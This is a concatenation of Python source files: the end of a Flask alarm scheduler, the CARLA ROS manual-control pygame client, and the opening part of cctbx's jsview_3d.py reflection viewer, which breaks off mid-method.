alarm_object = s.enter(delay, 1, trigger_alarm, (alarm, )) # schedule the alarm
thread = threading.Thread(target=s.run) # create a new thread and run the scheduler
thread.start() # start the thread
alarm['alarm_object'] = alarm_object # append the schedule event to the alarm dictionary
alarms.append(alarm) # add the alarm to the list of alarms
logging.info('%s:An alarm called "%s" has been restored and set for %s', datetime.now(), alarm['title'], datetime.fromtimestamp(alarm_date))
except json.decoder.JSONDecodeError:
logging.error('%s:There was an issue loading the alarms from the alarms.json file', datetime.now())
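# check_alarms() assumes alarms.json holds a JSON list of alarm dictionaries in the same
# shape written by the route above. An illustrative (hypothetical) file content:
# [
#     {
#         "alarm": "2021-12-01T07:30",
#         "title": "Morning briefing",
#         "news": true,
#         "weather": true,
#         "content": "The alarm is set to go off at 2021-12-01 07:30. The news will be announced."
#     }
# ]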
if __name__ == '__main__':
update_notifications() # update the notifications
check_alarms() # check if there are any alarms saved that can be loaded in
app.run(port=config['port'], debug=True) # run the flask app
|
carla_manual_control.py
|
#!/usr/bin/env python
#
# Copyright (c) 2017 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
# Copyright (c) 2019 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
Welcome to CARLA ROS manual control.
Use ARROWS or WASD keys for control.
W : throttle
S : brake
AD : steer
Q : toggle reverse
Space : hand-brake
P : toggle autopilot
M : toggle manual transmission
,/. : gear up/down
B : toggle manual control
F1 : toggle HUD
H/? : toggle help
ESC : quit
"""
from __future__ import print_function
from carla_msgs.msg import CarlaStatus
from carla_msgs.msg import CarlaEgoVehicleInfo
from carla_msgs.msg import CarlaEgoVehicleStatus
from carla_msgs.msg import CarlaEgoVehicleControl
from carla_msgs.msg import CarlaLaneInvasionEvent
from carla_msgs.msg import CarlaCollisionEvent
from sensor_msgs.msg import Image
from sensor_msgs.msg import NavSatFix
from std_msgs.msg import Bool
from transforms3d.euler import quat2euler
from ros_compatibility import (
CompatibleNode,
latch_on,
ros_ok,
ros_init,
ros_shutdown,
loginfo,
logwarn,
ROS_VERSION)
import datetime
import math
import numpy
if ROS_VERSION == 1:
from rospy import Time
from tf import LookupException
from tf import ConnectivityException
from tf import ExtrapolationException
import tf
from ros_compatibility import QoSProfile
elif ROS_VERSION == 2:
import rclpy
from rclpy.time import Time
from rclpy.callback_groups import ReentrantCallbackGroup
from tf2_ros import LookupException
from tf2_ros import ConnectivityException
from tf2_ros import ExtrapolationException
import tf2_ros
from rclpy.qos import QoSProfile
from threading import Thread
from builtin_interfaces.msg import Time
else:
raise NotImplementedError("Make sure you have a valid ROS_VERSION env variable set.")
try:
import pygame
from pygame.locals import KMOD_CTRL
from pygame.locals import KMOD_SHIFT
from pygame.locals import K_COMMA
from pygame.locals import K_DOWN
from pygame.locals import K_ESCAPE
from pygame.locals import K_F1
from pygame.locals import K_LEFT
from pygame.locals import K_PERIOD
from pygame.locals import K_RIGHT
from pygame.locals import K_SLASH
from pygame.locals import K_SPACE
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_d
from pygame.locals import K_h
from pygame.locals import K_m
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_s
from pygame.locals import K_w
from pygame.locals import K_b
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
# ==============================================================================
# -- World ---------------------------------------------------------------------
# ==============================================================================
class ManualControl(CompatibleNode):
"""
Handle the rendering
"""
def __init__(self, resolution):
super(ManualControl, self).__init__("ManualControl")
self._surface = None
self.role_name = self.get_param("role_name", "ego_vehicle")
self.hud = HUD(self.role_name, resolution['width'], resolution['height'], self)
self.controller = KeyboardControl(self.role_name, self.hud, self)
if ROS_VERSION == 1:
self.callback_group = None
elif ROS_VERSION == 2:
self.callback_group = ReentrantCallbackGroup()
self.image_subscriber = self.create_subscriber(
Image, "/carla/{}/rgb_view/image".format(self.role_name),
self.on_view_image, callback_group=self.callback_group)
self.collision_subscriber = self.create_subscriber(
CarlaCollisionEvent, "/carla/{}/collision".format(self.role_name),
self.on_collision, callback_group=self.callback_group)
self.lane_invasion_subscriber = self.create_subscriber(
CarlaLaneInvasionEvent, "/carla/{}/lane_invasion".format(self.role_name),
self.on_lane_invasion, callback_group=self.callback_group)
def on_collision(self, data):
"""
Callback on collision event
"""
intensity = math.sqrt(data.normal_impulse.x**2 +
data.normal_impulse.y**2 + data.normal_impulse.z**2)
self.hud.notification('Collision with {} (impulse {})'.format(
data.other_actor_id, intensity))
def on_lane_invasion(self, data):
"""
Callback on lane invasion event
"""
text = []
for marking in data.crossed_lane_markings:
if marking is CarlaLaneInvasionEvent.LANE_MARKING_OTHER:
text.append("Other")
elif marking is CarlaLaneInvasionEvent.LANE_MARKING_BROKEN:
text.append("Broken")
elif marking is CarlaLaneInvasionEvent.LANE_MARKING_SOLID:
text.append("Solid")
else:
text.append("Unknown ")
self.hud.notification('Crossed line %s' % ' and '.join(text))
def on_view_image(self, image):
"""
Callback when receiving a camera image
"""
array = numpy.frombuffer(image.data, dtype=numpy.dtype("uint8"))
array = numpy.reshape(array, (image.height, image.width, 4))
array = array[:, :, :3]
array = array[:, :, ::-1]
self._surface = pygame.surfarray.make_surface(array.swapaxes(0, 1))
def render(self, game_clock, display):
"""
render the current image
"""
do_quit = self.controller.parse_events(game_clock)
if do_quit:
return True # propagate the quit request to the main loop
self.hud.tick(game_clock)
if self._surface is not None:
display.blit(self._surface, (0, 0))
self.hud.render(display)
# ==============================================================================
# -- KeyboardControl -----------------------------------------------------------
# ==============================================================================
class KeyboardControl(object):
"""
Handle input events
"""
def __init__(self, role_name, hud, node):
self.role_name = role_name
self.hud = hud
self.node = node
self._autopilot_enabled = False
self._control = CarlaEgoVehicleControl()
self._steer_cache = 0.0
if ROS_VERSION == 1:
self.callback_group = None
elif ROS_VERSION == 2:
self.callback_group = ReentrantCallbackGroup()
fast_qos = QoSProfile(depth=10)
fast_latched_qos = QoSProfile(depth=10, durability=latch_on) # imported from ros_compat.
self.vehicle_control_manual_override_publisher = \
self.node.new_publisher(Bool,
"/carla/{}/vehicle_control_manual_override".format(
self.role_name),
qos_profile=fast_latched_qos, callback_group=self.callback_group)
self.vehicle_control_manual_override = False
self.auto_pilot_enable_publisher = \
self.node.new_publisher(Bool,
"/carla/{}/enable_autopilot".format(self.role_name),
qos_profile=fast_qos, callback_group=self.callback_group)
self.vehicle_control_publisher = \
self.node.new_publisher(CarlaEgoVehicleControl,
"/carla/{}/vehicle_control_cmd_manual".format(self.role_name),
qos_profile=fast_qos, callback_group=self.callback_group)
self.carla_status_subscriber = self.node.create_subscriber(CarlaStatus, "/carla/status",
self._on_new_carla_frame,
callback_group=self.callback_group)
self.set_autopilot(self._autopilot_enabled)
self.set_vehicle_control_manual_override(
self.vehicle_control_manual_override) # disable manual override
def set_vehicle_control_manual_override(self, enable):
"""
Set the manual control override
"""
self.hud.notification('Set vehicle control manual override to: {}'.format(enable))
self.vehicle_control_manual_override_publisher.publish((Bool(data=enable)))
def set_autopilot(self, enable):
"""
enable/disable the autopilot
"""
self.auto_pilot_enable_publisher.publish(Bool(data=enable))
# pylint: disable=too-many-branches
def parse_events(self, clock):
"""
parse an input event
"""
for event in pygame.event.get():
if event.type == pygame.QUIT:
return True
elif event.type == pygame.KEYUP:
if self._is_quit_shortcut(event.key):
return True
elif event.key == K_F1:
self.hud.toggle_info()
elif event.key == K_h or (event.key == K_SLASH and
pygame.key.get_mods() & KMOD_SHIFT):
self.hud.help.toggle()
elif event.key == K_b:
self.vehicle_control_manual_override = not self.vehicle_control_manual_override
self.set_vehicle_control_manual_override(self.vehicle_control_manual_override)
if event.key == K_q:
self._control.gear = 1 if self._control.reverse else -1
elif event.key == K_m:
self._control.manual_gear_shift = not self._control.manual_gear_shift
self.hud.notification(
'%s Transmission' %
('Manual' if self._control.manual_gear_shift else 'Automatic'))
elif self._control.manual_gear_shift and event.key == K_COMMA:
self._control.gear = max(-1, self._control.gear - 1)
elif self._control.manual_gear_shift and event.key == K_PERIOD:
self._control.gear = self._control.gear + 1
elif event.key == K_p:
self._autopilot_enabled = not self._autopilot_enabled
self.set_autopilot(self._autopilot_enabled)
self.hud.notification('Autopilot %s' %
('On' if self._autopilot_enabled else 'Off'))
if not self._autopilot_enabled and self.vehicle_control_manual_override:
self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
self._control.reverse = self._control.gear < 0
def _on_new_carla_frame(self, data):
"""
callback on new frame
As CARLA only processes one vehicle control command per tick,
send the current from within here (once per frame)
"""
if not self._autopilot_enabled and self.vehicle_control_manual_override:
try:
self.vehicle_control_publisher.publish(self._control)
except Exception as error:
self.node.logwarn("Could not send vehicle control: {}".format(error))
def _parse_vehicle_keys(self, keys, milliseconds):
"""
parse key events
"""
self._control.throttle = 1.0 if keys[K_UP] or keys[K_w] else 0.0
steer_increment = 5e-4 * milliseconds
if keys[K_LEFT] or keys[K_a]:
self._steer_cache -= steer_increment
elif keys[K_RIGHT] or keys[K_d]:
self._steer_cache += steer_increment
else:
self._steer_cache = 0.0
self._steer_cache = min(0.7, max(-0.7, self._steer_cache))
self._control.steer = round(self._steer_cache, 1)
self._control.brake = 1.0 if keys[K_DOWN] or keys[K_s] else 0.0
self._control.hand_brake = bool(keys[K_SPACE])
@staticmethod
def _is_quit_shortcut(key):
return (key == K_ESCAPE) or (key == K_q and pygame.key.get_mods() & KMOD_CTRL)
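# A standalone sketch (not used by the node) of the incremental steering filter in
# _parse_vehicle_keys above: the steering command grows by 5e-4 per millisecond while a
# key is held, resets when neither key is pressed, and is clamped to [-0.7, 0.7].
# The function name and arguments are illustrative only.
def demo_steer_filter(steer_cache, steer_left, steer_right, milliseconds):
    increment = 5e-4 * milliseconds
    if steer_left:
        steer_cache -= increment
    elif steer_right:
        steer_cache += increment
    else:
        steer_cache = 0.0
    steer_cache = min(0.7, max(-0.7, steer_cache))
    return round(steer_cache, 1)  # the rounded value is what gets published as the steer command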
# ==============================================================================
# -- HUD -----------------------------------------------------------------------
# ==============================================================================
class HUD(object):
"""
Handle the info display
"""
def __init__(self, role_name, width, height, node):
self.role_name = role_name
self.dim = (width, height)
self.node = node
font = pygame.font.Font(pygame.font.get_default_font(), 20)
fonts = [x for x in pygame.font.get_fonts() if 'mono' in x]
default_font = 'ubuntumono'
mono = default_font if default_font in fonts else fonts[0]
mono = pygame.font.match_font(mono)
self._font_mono = pygame.font.Font(mono, 14)
self._notifications = FadingText(font, (width, 40), (0, height - 40))
self.help = HelpText(pygame.font.Font(mono, 24), width, height)
self._show_info = True
self._info_text = []
self.vehicle_status = CarlaEgoVehicleStatus()
if ROS_VERSION == 1:
self.tf_listener = tf.TransformListener()
self.callback_group = None
elif ROS_VERSION == 2:
self.tf_buffer = tf2_ros.Buffer()
self.tf_listener = tf2_ros.TransformListener(self.tf_buffer, node=self.node)
self.callback_group = ReentrantCallbackGroup()
self.vehicle_status_subscriber = node.create_subscriber(
CarlaEgoVehicleStatus, "/carla/{}/vehicle_status".format(self.role_name),
self.vehicle_status_updated, callback_group=self.callback_group)
self.vehicle_info = CarlaEgoVehicleInfo()
self.vehicle_info_subscriber = node.create_subscriber(
CarlaEgoVehicleInfo, "/carla/{}/vehicle_info".format(self.role_name),
self.vehicle_info_updated, callback_group=self.callback_group, qos_profile=QoSProfile(depth=10, durability=latch_on))
self.latitude = 0
self.longitude = 0
self.manual_control = False
self.gnss_subscriber = node.create_subscriber(
NavSatFix, "/carla/{}/gnss".format(self.role_name), self.gnss_updated,
callback_group=self.callback_group)
self.manual_control_subscriber = node.create_subscriber(
Bool, "/carla/{}/vehicle_control_manual_override".format(self.role_name),
self.manual_control_override_updated, callback_group=self.callback_group)
self.carla_status = CarlaStatus()
self.status_subscriber = node.create_subscriber(CarlaStatus, "/carla/status",
self.carla_status_updated,
callback_group=self.callback_group)
def tick(self, clock):
"""
tick method
"""
self._notifications.tick(clock)
def carla_status_updated(self, data):
"""
Callback on carla status
"""
self.carla_status = data
self.update_info_text()
def manual_control_override_updated(self, data):
"""
Callback on vehicle status updates
"""
self.manual_control = data.data
self.update_info_text()
def vehicle_status_updated(self, vehicle_status):
"""
Callback on vehicle status updates
"""
self.vehicle_status = vehicle_status
self.update_info_text()
def vehicle_info_updated(self, vehicle_info):
"""
Callback on vehicle info updates
"""
self.vehicle_info = vehicle_info
self.update_info_text()
def gnss_updated(self, data):
"""
Callback on gnss position updates
"""
self.latitude = data.latitude
self.longitude = data.longitude
self.update_info_text()
def update_info_text(self):
"""
update the displayed info text
"""
if not self._show_info:
return
try:
if ROS_VERSION == 1:
(position, rotation) = self.tf_listener.lookupTransform(
'/map', self.role_name, Time())
elif ROS_VERSION == 2:
transform = self.tf_buffer.lookup_transform(
target_frame='map', source_frame=self.role_name, time=Time())
position = [transform.transform.translation.x,
transform.transform.translation.y,
transform.transform.translation.z]
rotation = [transform.transform.rotation.w,
transform.transform.rotation.x,
transform.transform.rotation.y,
transform.transform.rotation.z]
_, _, yaw = quat2euler(rotation)
yaw = math.degrees(yaw)
x = position[0]
y = position[1]
z = position[2]
except (LookupException, ConnectivityException, ExtrapolationException):
x = 0
y = 0
z = 0
yaw = 0
heading = 'N' if abs(yaw) < 89.5 else ''
heading += 'S' if abs(yaw) > 90.5 else ''
heading += 'E' if 179.5 > yaw > 0.5 else ''
heading += 'W' if -0.5 > yaw > -179.5 else ''
fps = 0
time = str(datetime.timedelta(seconds=self.node.get_time()))[:10]
if self.carla_status.fixed_delta_seconds:
fps = 1 / self.carla_status.fixed_delta_seconds
self._info_text = [
'Frame: % 22s' % self.carla_status.frame,
'Simulation time: % 12s' % time,
'FPS: % 24.1f' % fps, '',
'Vehicle: % 20s' % ' '.join(self.vehicle_info.type.title().split('.')[1:]),
'Speed: % 15.0f km/h' % (3.6 * self.vehicle_status.velocity),
u'Heading:% 16.0f\N{DEGREE SIGN} % 2s' % (yaw, heading),
'Location:% 20s' % ('(% 5.1f, % 5.1f)' % (x, y)),
'GNSS:% 24s' % ('(% 2.6f, % 3.6f)' % (self.latitude, self.longitude)),
'Height: % 18.0f m' % z, ''
]
self._info_text += [
('Throttle:', self.vehicle_status.control.throttle, 0.0, 1.0),
('Steer:', self.vehicle_status.control.steer, -1.0, 1.0),
('Brake:', self.vehicle_status.control.brake, 0.0, 1.0),
('Reverse:', self.vehicle_status.control.reverse),
('Hand brake:', self.vehicle_status.control.hand_brake),
('Manual:', self.vehicle_status.control.manual_gear_shift),
'Gear: %s' % {
-1: 'R',
0: 'N'
}.get(self.vehicle_status.control.gear, self.vehicle_status.control.gear), ''
]
self._info_text += [('Manual ctrl:', self.manual_control)]
if self.carla_status.synchronous_mode:
self._info_text += [('Sync mode running:', self.carla_status.synchronous_mode_running)]
self._info_text += ['', '', 'Press <H> for help']
def toggle_info(self):
"""
show/hide the info text
"""
self._show_info = not self._show_info
def notification(self, text, seconds=2.0):
"""
display a notification for x seconds
"""
self._notifications.set_text(text, seconds=seconds)
def error(self, text):
"""
display an error
"""
self._notifications.set_text('Error: %s' % text, (255, 0, 0))
def render(self, display):
"""
render the display
"""
if self._show_info:
info_surface = pygame.Surface((220, self.dim[1]))
info_surface.set_alpha(100)
display.blit(info_surface, (0, 0))
v_offset = 4
bar_h_offset = 100
bar_width = 106
for item in self._info_text:
if v_offset + 18 > self.dim[1]:
break
if isinstance(item, list):
if len(item) > 1:
points = [(x + 8, v_offset + 8 + (1.0 - y) * 30) for x, y in enumerate(item)]
pygame.draw.lines(display, (255, 136, 0), False, points, 2)
item = None
v_offset += 18
elif isinstance(item, tuple):
if isinstance(item[1], bool):
rect = pygame.Rect((bar_h_offset + 50, v_offset + 8), (6, 6))
pygame.draw.rect(display, (255, 255, 255), rect, 0 if item[1] else 1)
else:
rect_border = pygame.Rect((bar_h_offset, v_offset + 8), (bar_width, 6))
pygame.draw.rect(display, (255, 255, 255), rect_border, 1)
f = (item[1] - item[2]) / (item[3] - item[2])
if item[2] < 0.0:
rect = pygame.Rect((bar_h_offset + int(f * (bar_width - 6)), v_offset + 8),
(6, 6))
else:
rect = pygame.Rect((bar_h_offset, v_offset + 8),
(int(f * bar_width), 6))
pygame.draw.rect(display, (255, 255, 255), rect)
item = item[0]
if item: # At this point it has to be a str.
surface = self._font_mono.render(item, True, (255, 255, 255))
display.blit(surface, (8, v_offset))
v_offset += 18
self._notifications.render(display)
self.help.render(display)
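# A small sketch (hypothetical helper, not referenced elsewhere) of the heading logic in
# HUD.update_info_text above: yaw in degrees is mapped to a compass string, e.g. a yaw of
# 45 degrees yields 'NE' and a yaw of -135 degrees yields 'SW'.
def demo_heading_from_yaw(yaw):
    heading = 'N' if abs(yaw) < 89.5 else ''
    heading += 'S' if abs(yaw) > 90.5 else ''
    heading += 'E' if 179.5 > yaw > 0.5 else ''
    heading += 'W' if -0.5 > yaw > -179.5 else ''
    return heading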
# ==============================================================================
# -- FadingText ----------------------------------------------------------------
# ==============================================================================
class FadingText(object):
"""
Support Class for info display, fade out text
"""
def __init__(self, font, dim, pos):
self.font = font
self.dim = dim
self.pos = pos
self.seconds_left = 0
self.surface = pygame.Surface(self.dim)
def set_text(self, text, color=(255, 255, 255), seconds=2.0):
"""
set the text
"""
text_texture = self.font.render(text, True, color)
self.surface = pygame.Surface(self.dim)
self.seconds_left = seconds
self.surface.fill((0, 0, 0, 0))
self.surface.blit(text_texture, (10, 11))
def tick(self, clock):
"""
tick for fading
"""
delta_seconds = 1e-3 * clock.get_time()
self.seconds_left = max(0.0, self.seconds_left - delta_seconds)
self.surface.set_alpha(500.0 * self.seconds_left)
def render(self, display):
"""
render the fading
"""
display.blit(self.surface, self.pos)
# ==============================================================================
# -- HelpText ------------------------------------------------------------------
# ==============================================================================
class HelpText(object):
"""
Show the help text
"""
def __init__(self, font, width, height):
lines = __doc__.split('\n')
self.font = font
self.dim = (680, len(lines) * 22 + 12)
self.pos = (0.5 * width - 0.5 * self.dim[0], 0.5 * height - 0.5 * self.dim[1])
self.seconds_left = 0
self.surface = pygame.Surface(self.dim)
self.surface.fill((0, 0, 0, 0))
for n, line in enumerate(lines):
text_texture = self.font.render(line, True, (255, 255, 255))
self.surface.blit(text_texture, (22, n * 22))
self._render = False
self.surface.set_alpha(220)
def toggle(self):
"""
Show/hide the help
"""
self._render = not self._render
def render(self, display):
"""
render the help
"""
if self._render:
display.blit(self.surface, self.pos)
# ==============================================================================
# -- main() --------------------------------------------------------------------
# ==============================================================================
def main(args=None):
"""
main function
"""
ros_init(args)
# resolution should be similar to spawned camera with role-name 'view'
resolution = {"width": 800, "height": 600}
pygame.init()
pygame.font.init()
pygame.display.set_caption("CARLA ROS manual control")
try:
display = pygame.display.set_mode((resolution['width'], resolution['height']),
pygame.HWSURFACE | pygame.DOUBLEBUF)
manual_control_node = ManualControl(resolution)
clock = pygame.time.Clock()
if ROS_VERSION == 2:
executer = rclpy.executors.MultiThreadedExecutor()
executer.add_node(manual_control_node)
spin_thread = Thread(target=executer.spin)
spin_thread.start()
while ros_ok():
clock.tick_busy_loop(60)
if manual_control_node.render(clock, display):
return
pygame.display.flip()
except KeyboardInterrupt:
loginfo("User requested shut down.")
finally:
ros_shutdown()
if ROS_VERSION == 2:
spin_thread.join()
pygame.quit()
if __name__ == '__main__':
main()
|
jsview_3d.py
|
from __future__ import absolute_import, division, print_function
from libtbx.math_utils import roundoff
import traceback
from cctbx.miller import display2 as display
from cctbx.array_family import flex
from cctbx import miller
from scitbx import graphics_utils
from scitbx import matrix
from libtbx.utils import Sorry, to_str
from websocket_server import WebsocketServer
import threading, math, sys, cmath
from time import sleep
import os.path, time, copy
import libtbx
from libtbx import easy_mp
import webbrowser, tempfile
from six.moves import range
class ArrayInfo:
def __init__(self, millarr, mprint=sys.stdout.write, fomlabel=None):
from iotbx.gui_tools.reflections import get_array_description
data = millarr.data()
if (isinstance(data, flex.int)):
data = [e for e in data if e != display.inanval]
if millarr.is_complex_array():
data = flex.abs(millarr.data())
data = [e for e in data if not math.isnan(e)]
self.maxdata = max(data)
self.mindata = min(data)
self.maxsigmas = self.minsigmas = None
if millarr.sigmas() is not None:
data = millarr.sigmas()
data = [e for e in data if not math.isnan(e)]
self.maxsigmas = max(data)
self.minsigmas = min(data)
self.minmaxdata = (roundoff(self.mindata), roundoff(self.maxdata))
self.minmaxsigs = (roundoff(self.minsigmas), roundoff(self.maxsigmas))
self.labels = self.desc = ""
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if millarr.info():
self.labels = millarr.info().label_string()
if fomlabel:
self.labels = millarr.info().label_string() + " + " + fomlabel
self.desc = get_array_description(millarr)
self.span = ("?" , "?")
dmin = 0.0
dmax = 0.0
try:
self.span = ( millarr.index_span().min(), millarr.index_span().max())
dmin = millarr.d_max_min()[1]
dmax = millarr.d_max_min()[0]
except Exception as e:
mprint(to_str(e))
issymunique = millarr.is_unique_set_under_symmetry()
self.infotpl = (self.labels, self.desc, millarr.indices().size(), self.span,
self.minmaxdata, self.minmaxsigs, (roundoff(dmin), roundoff(dmax)), issymunique )
self.infostr = "%s (%s), %s HKLs: %s, MinMax: %s, MinMaxSigs: %s, d_minmax: %s, SymUnique: %d" %self.infotpl
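# Illustrative use of ArrayInfo (assuming 'some_miller_array' is any cctbx miller array
# already loaded elsewhere): the summary string bundles labels, description, size,
# index span, data/sigma ranges, resolution range and symmetry-uniqueness in one line.
#   info = ArrayInfo(some_miller_array)
#   print(info.infostr)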
def MakeHKLscene( proc_array, pidx, setts, mapcoef_fom_dict, merge, mprint=sys.stdout.write):
scenemaxdata =[]
scenemindata =[]
scenemaxsigmas = []
sceneminsigmas = []
scenearrayinfos = []
hklscenes = []
fomsarrays_idx = [(None, [])]
#mprint("in MakeHKLscene", verbose=True)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
if proc_array.is_complex_array():
fomsarrays_idx.extend( mapcoef_fom_dict.get(proc_array.info().label_string()) )
settings = setts
if (settings.expand_anomalous or settings.expand_to_p1) \
and not proc_array.is_unique_set_under_symmetry() and not merge:
#settings = copy.deepcopy(settings)
settings.expand_anomalous = False
settings.expand_to_p1 = False
mprint("The " + proc_array.info().label_string() + \
" array is not symmetry unique and therefore won't be expanded")
for (fomsarray, fidx) in fomsarrays_idx:
hklscene = display.scene(miller_array=proc_array, merge=merge,
settings=settings, foms_array=fomsarray, fullprocessarray=True )
if not hklscene.SceneCreated:
mprint("The " + proc_array.info().label_string() + " array was not processed")
#return False
continue
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
# cast any NAN values to 1 of the colours and radii to 0.2 before writing javascript
if hklscene.SceneCreated:
hklscenes.append( hklscene)
b = flex.bool([bool(math.isnan(e[0]) + math.isnan(e[1]) + math.isnan(e[2])) for e in hklscene.colors])
hklscene.colors = hklscene.colors.set_selected(b, (1.0, 1.0, 1.0))
b = flex.bool([bool(math.isnan(e)) for e in hklscene.radii])
hklscene.radii = hklscene.radii.set_selected(b, 0.2)
fomslabel = None
if fomsarray:
fomslabel = fomsarray.info().label_string()
ainf = ArrayInfo(hklscene.work_array, fomlabel=fomslabel)
infostr = ainf.infostr
scenemaxdata.append( ainf.maxdata )
scenemindata.append( ainf.mindata )
scenemaxsigmas.append(ainf.maxsigmas)
sceneminsigmas.append(ainf.minsigmas)
scenearrayinfos.append((infostr, pidx, fidx))
#self.mprint("%d, %s" %(i, infostr) )
#i +=1
return (hklscenes, scenemaxdata, scenemindata, scenemaxsigmas, sceneminsigmas, scenearrayinfos)
def MakeTtips(hklscene, j):
tooltipstringsdict = {}
colstraliases = ""
if hklscene.isUsingFOMs():
return tooltipstringsdict, colstraliases # already have tooltips for the scene without the associated fom
colstraliases += "\n var st%d = '\\n%s: '" %(j, hklscene.work_array.info().label_string() )
ocolstr = hklscene.work_array.info().label_string()
if hklscene.work_array.is_complex_array():
ampl = flex.abs(hklscene.data)
phases = flex.arg(hklscene.data) * 180.0/math.pi
# purge nan values from array to avoid crash in fmod_positive()
b = flex.bool([bool(math.isnan(e)) for e in phases])
# replace the nan values with an arbitrary float value
phases = phases.set_selected(b, 42.4242)
# Cast negative degrees to equivalent positive degrees
phases = flex.fmod_positive(phases, 360.0)
sigmas = hklscene.sigmas
for i,datval in enumerate(hklscene.data):
od =""
if hklscene.work_array.is_complex_array():
od = str(roundoff(ampl[i], 2)) + ", " + str(roundoff(phases[i], 1)) + \
"\'+DGR+\'"
elif sigmas is not None:
od = str(roundoff(datval, 2)) + ", " + str(roundoff(sigmas[i], 2))
else:
od = str(roundoff(datval, 2))
if not (math.isnan( abs(datval) ) or datval == display.inanval):
hkl = hklscene.indices[i]
if hkl not in tooltipstringsdict: # dict.has_key() does not exist in Python 3
spbufttip = '\'+hk+\'%s, %s, %s' %(hkl[0], hkl[1], hkl[2])
spbufttip += '\ndres: %s ' %str(roundoff(hklscene.dres[i], 2) )
spbufttip += '\'+AA+\'' # javascript alias for angstrom
tooltipstringsdict[hkl] = spbufttip
# st1, st2,... are javascript aliases for miller array labelstrings as declared in colstraliases
tooltipstringsdict[hkl] += '\'+st%d+\'%s' %(j, od)
return tooltipstringsdict, colstraliases
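# A plain-Python sketch of the phase clean-up performed above with flex.fmod_positive:
# NaN phases are replaced by a placeholder and negative degrees are mapped to the
# equivalent angle in [0, 360). The helper name is illustrative only.
def demo_normalise_phase(phase_deg):
    import math
    if math.isnan(phase_deg):
        return 42.4242  # same arbitrary placeholder value as used above
    return phase_deg % 360.0  # e.g. -90.0 becomes 270.0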
class hklview_3d:
def __init__ (self, *args, **kwds) :
self.settings = kwds.get("settings")
self.miller_array = None
self.symops = []
self.sg = None
self.tooltipstrings = []
self.tooltipstringsdict = {}
self.d_min = None
self.scene = None
self.merge = False
self.NGLscriptstr = ""
self.camera_type = "orthographic"
self.primitivetype = "SphereBuffer"
self.script_has_tooltips = False
self.url = ""
self.binarray = "Resolution"
self.icolourcol = None
self.iradiicol = None
self.iarray = None
self.isnewfile = False
self.colstraliases = ""
self.binvals = []
self.workingbinvals = []
self.proc_arrays = []
self.HKLscenes = []
self.HKLscenesdict = {}
self.HKLscenesMaxdata = []
self.HKLscenesMindata = []
self.HKLscenesMaxsigmas = []
self.HKLscenesMinsigmas = []
self.sceneisdirty = True
self.hkl_scenes_info = []
self.match_valarrays = []
self.binstrs = []
self.mapcoef_fom_dict = {}
self.verbose = False
if 'verbose' in kwds:
self.verbose = kwds['verbose']
self.mprint = sys.stdout.write
if 'mprint' in kwds:
self.mprint = kwds['mprint']
self.nbin = 0
tempdir = tempfile.gettempdir()
self.hklfname = os.path.join(tempdir, "hkl.htm" )
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
if 'htmlfname' in kwds:
self.hklfname = kwds['htmlfname']
self.hklfname = os.path.abspath( self.hklfname )
self.jscriptfname = os.path.join(tempdir, "hkljstr.js")
if os.path.isfile(self.jscriptfname):
os.remove(self.jscriptfname)
if 'jscriptfname' in kwds:
self.jscriptfname = kwds['jscriptfname']
self.mprint('Output will be written to \"%s\"\n' \
'including reference to NGL JavaScript \"%s\"' %(self.hklfname, self.jscriptfname))
self.hklhtml = r"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta charset="utf-8" />
</head>
<body>
<script src="%s" type="text/javascript"></script>
<script src="%s" type="text/javascript"></script>
"""
self.htmldiv = """
<div id="viewport" style="width:100%; height:100%;"></div>
</body></html>
"""
self.colourgradientvalues = []
self.UseOSBrowser = True
if 'UseOSBrowser' in kwds:
self.UseOSBrowser = kwds['UseOSBrowser']
self.viewmtrxelms = None
self.HKLscenesKey = ( 0, False,
self.settings.expand_anomalous, self.settings.expand_to_p1 )
self.msgqueue = []
self.websockclient = None
self.lastmsg = "Ready"
self.browserisopen = False
self.msgdelim = ":\n"
self.msgqueuethrd = None
self.StartWebsocket()
def __exit__(self, exc_type, exc_value, traceback):
# not called unless instantiated with a "with hklview_3d ... " statement
self.server.shutdown()
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
def update_settings(self, diffphil, currentphil) :
if hasattr(diffphil, "filename") \
or hasattr(diffphil, "spacegroup_choice") \
or hasattr(diffphil, "merge_data") \
or hasattr(diffphil, "column") \
or hasattr(diffphil, "spacegroup_choice") \
or hasattr(diffphil, "using_space_subgroup") \
or hasattr(diffphil, "viewer") \
and ( \
hasattr(diffphil.viewer, "show_data_over_sigma") \
or hasattr(diffphil.viewer, "show_missing") \
or hasattr(diffphil.viewer, "show_only_missing") \
or hasattr(diffphil.viewer, "show_systematic_absences") \
or hasattr(diffphil.viewer, "slice_axis") \
or hasattr(diffphil.viewer, "slice_mode") \
or hasattr(diffphil.viewer, "slice_index") \
or hasattr(diffphil.viewer, "scale") \
or hasattr(diffphil.viewer, "nth_power_scale_radii") \
or self.settings.inbrowser==False and \
( hasattr(diffphil.viewer, "expand_anomalous") or \
hasattr(diffphil.viewer, "expand_to_p1") )\
or hasattr(diffphil.viewer, "show_anomalous_pairs") \
):
self.sceneisdirty = True
#if self.miller_array is None or self.iarray < 0 or self.isnewfile:
self.ConstructReciprocalSpace(currentphil, merge=self.merge)
#import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
msg = ""
if self.iarray >=0:
self.scene = self.HKLscenes[self.iarray]
self.DrawNGLJavaScript()
msg = "Rendered %d reflections\n" % self.scene.points.size()
"""if self.settings.inbrowser and hasattr(diffphil, "viewer") and \
( hasattr(diffphil.viewer, "expand_anomalous") or \
hasattr(diffphil.viewer, "expand_to_p1") ):
"""
msg += self.ExpandInBrowser(P1= self.settings.expand_to_p1,
friedel_mate= self.settings.expand_anomalous)
return msg
